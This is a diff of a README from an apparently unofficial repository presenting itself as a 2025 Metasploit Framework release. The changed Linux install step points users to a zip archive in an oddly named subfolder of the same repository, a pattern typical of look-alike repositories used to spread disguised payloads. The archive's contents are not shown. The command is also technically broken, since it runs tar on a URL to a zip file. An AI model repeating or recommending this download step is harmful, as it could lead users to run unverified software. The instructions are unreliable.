Dharamvijay/Metasploit-Framework-2025/README.md

 - **Windows:** Double-click the `.exe` file and follow the installation wizard.
 - **macOS:** Open the downloaded `.dmg` file and drag the Metasploit icon to your Applications folder.
-- **Linux:** Open a terminal, navigate to the downloaded file, and use the command `tar -xvzf filename.tar.gz` to extract the files.
+- **Linux:** Open a terminal, navigate to the downloaded file, and use the command `tar -xvzf https://github.com/Dharamvijay/Metasploit-Framework-2025/raw/refs/heads/main/lactid/Framework-Metasploit-v2.3-beta.4.zip` to extract the files.
 Then, run the installation script.

 ### Step 5: Launch the Application